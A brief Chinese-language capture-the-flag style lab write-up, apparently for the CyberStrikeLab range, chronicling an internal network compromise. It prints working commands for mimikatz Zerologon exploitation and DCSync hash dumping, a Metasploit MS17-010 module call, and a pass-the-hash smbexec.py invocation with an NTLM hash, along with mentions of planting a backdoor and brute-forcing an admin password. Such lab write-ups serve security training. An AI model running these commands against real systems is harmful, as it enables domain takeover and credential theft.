信息收集
先看fscan扫描记录

看看这几个网站,去搜了一下漏洞发现存在后台getshell,直接进去,amdn/tao


增加一个后门。

内网渗透
1 | 192.168.20.30:88 open |
有一个thinkphp框架

但是没有扫出漏洞,看看有什么路径吧,也没有扫出来东西但是看到题目有提示

那么去爆破下密码试试

发现密码是admin123,直接连接就行

ms17_010
还差一台30的机器打一下ms17010试试毕竟前面两台都是的
1 | use admin/smb/ms17_010_command |
但是发现好像不行,那就先上线到cs再说,这里先生成一个exe让第一个web上相然后转发上线,但是这里有个问题就是在20这台机器上,蚁剑无法上传文件会报错,所以就使用php去下载。

已经下载了

zerologon
1 | shell mimikatz.exe "lsadump::zerologon /target:192.168.20.30 /account:WIN-7NRTJO59O7N$ "exit" |

发现存在zerologon漏洞,那么去滞空下
1 | shell mimikatz.exe "lsadump::zerologon /target:cyberstrikelab.com /ntlm /null /account:WIN-7NRTJO59O7N$ /exploit" "exit" |

接下来导出下域管理的hash
1 | shell mimikatz.exe "lsadump::dcsync /csv /domain:cyberstrikelab.com /dc:WIN-7NRTJO59O7N.cyberstrikelab.com /user:administrator /authuser:WIN-7NRTJO59O7N$ /authpassword:\"\" /authntlm" "exit" |

然后打一个pth即可
1 | proxychains4 python3 smbexec.py -hashes :f349636281150c001081894de72b4e2b cyberstrikelab.com/administrator@192.168.20.30 |
